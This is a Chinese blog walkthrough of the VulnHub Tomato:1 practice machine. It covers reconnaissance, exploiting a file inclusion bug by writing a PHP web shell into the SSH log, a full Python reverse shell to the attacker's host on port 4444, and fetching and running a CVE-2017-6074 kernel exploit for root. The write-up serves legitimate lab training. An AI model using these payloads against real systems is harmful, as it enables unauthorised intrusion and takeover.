VulnHub渗透测试实战靶场 - Tomato:1

最新推荐文章于 2024-09-14 17:31:34 发布
最新推荐文章于 2024-09-14 17:31:34 发布
阅读量2k 收藏 4
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/119811906
版权
本文详细记录了一次渗透测试的过程,从下载并搭建Tomato靶机开始,通过信息搜集发现了靶机的IP、开放端口及目录。接着,利用目录遍历和文件包含漏洞,结合SSH服务,成功getshell。最后,通过探测内核版本,利用特定漏洞获取了root权限,展示了完整的渗透测试流程。
摘要由CSDN通过智能技术生成

VulnHub渗透测试实战靶场 - Tomato:1

环境下载

Tomato:1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.137
  • 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-10000 192.168.246.137,发现开放了 21、80、2211、8888 四个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.137

漏洞挖掘

  • 访问 http://192.168.246.137/antibot_image/ 发现存在目录 antibots,接着访问该目录,发现存在很多文件
  • 访问 http://192.168.246.137/antibot_image/antibots/info.php,找到 phpinfo 的信息,F12查看源码发现 hint,存在文件包含漏洞

getshell

  • 前面信息搜集时发现开放了 2211 端口,服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件
  • 先查看日志文件是不是在默认路径:http://192.168.246.137/antibot_image/antibots/info.php?image=/var/log/auth.log
  • 利用 ssh 连接,写入一句话木马:ssh '<?php system($_GET['H3rmesk1t']);?>'@192.168.246.137 -p 2211
  • 查看靶机是否安装了 python,whereis python,可以看到目标靶机安装了python3,那就可以利用 python 进行反弹了
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.246.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • 执行命令 python3 -c 'import pty;pty.spawn("/bin/bash")' 将 shell 变为交互式的 shell

提权

  • 执行命令 uname -a 查看 linux 内核版本,寻找有无可以利用的 exp,exp链接
  • 运行 compile.sh 编译c文件,然后在 kali 上用 Python 起一个 Http 服务,python2 -m SimpleHTTPServer 8888,接着在靶机用用 wget 命令 wget http://192.168.246.129:8888/CVE-2017-6074下载 exp
  • 给 exp 赋予执行权限 chmod +x CVE-2017-6074
  • 运行 exp,拿到 root 权限
H3rmesk1t
关注
专栏目录
VulnhubTomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
tomato-靶机渗透测试
m0_54323635的博客
10-09 224
tomato-靶机渗透测试
VulnHub渗透靶场-DarkHole_1
最新发布
m0_74631795的博客
09-14 914
若存在漏洞,此时管理员的密码已经被修改为123456,回到刚才的登录页面,使用管理员账号进行登录。新建id文件,并写入PATH,运行toto文件使用john身份调用id命令时就会获得shell。使用/bin/bash为默认shell的用户有root,darkhole,john。将shell命令写入脚本中,执行时,就可以得到root权限的shell了。用户名为john,密码为password的内容。猜测管理员的id为1,修改id=1重新发送。2-1直接修改url的id值,操作失败。使用新用户的账号密码登录。
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1540
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1223
靶场通关 | Tomato靶机通关秘籍~
vulnhub靶场Tomato
kukudeshuo的博客
07-25 718
vulnhub靶场Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶机Tomato:(192.168.109.141) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标哦靶机IP为192.168.109.141 使用nmap扫描查看目标端口开放情况 开
vim-airline-tomato:番茄技术
02-01
然后,可以通过Vim的包管理器如Vundle或NeoBundle进行安装,或者使用git克隆`vim-airline-tomato-master`仓库到`.vim/pack`目录下。安装完成后,需要在`.vimrc`配置文件中启用该插件,并根据需要进行个性化设置。 #...
healthy-tomato:制作POC组
03-27
1. **Swing或JavaFX**:这是两个Java GUI库,可以用来创建用户界面,展示倒计时、设置工作时间和休息时间等。 2. **多线程**:为了同时执行倒计时和响应用户操作,我们需要用到Java的并发特性,如Thread类或...
majestic-tomato:用Stackbit创建的Jamstack网站
04-02
:sparkles: 雄伟的西红柿 :sparkles: 这是一个使用作为的网站。 它是在不到一分钟的时间内使用创建的。... npx @stackbit/sanity-pull --ssg hugo --sanity-project-id qvv3l1s6 --sanity-token $SANITY_ACCESS_
curious-tomato:用Stackbit创建的Jamstack网站
04-19
:sparkles: 好奇的西红柿 :sparkles: 这是一个使用Git作为的网站。 它是在不到一分钟的时间内使用创建的。 您可以像这样,或探索一些变体。 如何不同: :artist_palette: 看 :pencil: 内容管理系统 :gear: 静态网站...
caring-tomato:用Stackbit创建的Jamstack网站
04-22
原因不以营利为主题的模板。 浏览。 使用此可配置的主题,增加非营利性网站或导致网站的存在。 CloudCannon被制成 ,云CMS的化身。 在找到更多模板,主题和分步的Jekyll教程。特征预建页面预先样式化的组件可配置...
VulnHub-Tomato靶机详细渗透过程
MRS_jianai的博客
12-21 1096
VulnHub-Tomato靶机详细渗透过程
tomato靶机渗透测试
weixin_49340699的博客
07-28 1441
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Vulnhub靶机TOMATO_ 1
LainWith的博客
08-29 1163
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
Tomato靶机渗透
qq_44732584的博客
03-23 489
渗透测试
靶机实战系列之Tomato靶机
Javachichi的博客
02-07 1089
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
vlunhubtomato
鲨鱼辣椒的博客
05-31 628
目录 信息搜集 扫描网段确定主机IP地址 ​扫描该IP地址开放端口以及服务 ​发现漏洞 利用IP地址登录 ​尝试扫描出的端口 爆破网站目录 发现敏感文件泄露 利用漏洞 尝试getsell 利用php反弹shell 权限提升 在该目录下开启http服务 在getshell里下载该文件 信息搜集 扫描网段确定主机IP地址 扫描该IP地址开放端口以及服务 nmap -A -p- 192.168.179.128 发现漏洞 利用IP地址登录 尝试扫描出的端口 只有88
vulnhub靶场-tomato
qq_42947816的博客
03-07 7640
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 1877
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试安全性和发现潜在的漏洞。
<template> <div class="category-select"> <el-cascader v-model="selectedCategory" :options="categoryOptions" placeholder="请选择分类" size="medium" clearable change-on-select ></el-cascader> </div> </template> <script> export default { data() { return { selectedCategory: [], // 选中的分类 categoryOptions: [ { value: 'fruit', label: '水果', children: [ { value: 'apple', label: '苹果' }, { value: 'banana', label: '香蕉' }, { value: 'orange', label: '橙子' } ] }, { value: 'vegetable', label: '蔬菜', children: [ { value: 'cabbage', label: '白菜' }, { value: 'carrot', label: '胡萝卜' }, { value: 'tomato', label: '番茄' } ] } ] } } } </script> <style scoped> .category-select .el-cascader__label { background-color: #f0f0f0; border-radius: 4px; padding: 6px 12px; color: #333; font-size: 14px; margin-right: 6px; } .category-select .el-cascader__suffix { font-size: 12px; color: #999; } </style>加好看的css样式
05-17
<style scoped> .category-select .el-cascader__label { background-color: #f0f0f0; border-radius: 4px; padding: 6px 12px; color: #333; font-size: 14px; margin-right: 6px; } .category-select .el-cascader__suffix { font-size: 12px; color: #999; } /* 添加选中后的样式 */ .category-select .el-cascader__label--medium.is-active { background-color: #409EFF; color: #fff; } .category-select .el-cascader__label--medium.is-active .el-cascader__suffix { color: #fff; } </style>
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值